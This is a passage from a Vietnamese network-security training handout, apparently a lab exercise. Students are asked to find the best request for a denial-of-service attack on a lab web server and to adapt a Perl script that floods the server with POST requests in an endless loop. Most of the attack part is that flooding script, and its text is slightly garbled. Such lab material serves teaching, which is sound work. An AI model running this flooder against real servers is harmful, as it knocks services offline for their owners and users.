TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com 4. Kiểm tra:
5. Truy cập lại website:
Lưu Hành Nội Bộ62
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
II. Application: Yêu cầu:
1. Tìm request tối ưu nhất để thực hiện DoS Web Server tại địa chỉ: 192.168.X.250.2. Tùy biến lại nội dung chương trình sau để thực hiện gửi yêu cầu đến Server:
Lưu Hành Nội Bộ 63
#!/usr/bin/perluse IO::Socket;
$host = "<hostname>";$pth = "<path>";$postit = "<value>";$lg = length $postit;
while(1)my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "\nError: $!\n" unless $sock;
print $sock "POST $pth"."HTTP/1.1\n";print $sock "Host: $host\n";print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";print $sock "Referer: $host\n";print $sock "Accept-Language: en-us\n";print $sock "Content-Type: application/x-www-form-urlencoded\n";print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2\n";print $sock "Content-Length: $lg\n\n";print $sock "$postit\n";close($sock);syswrite STDOUT, "DoS...\n";
}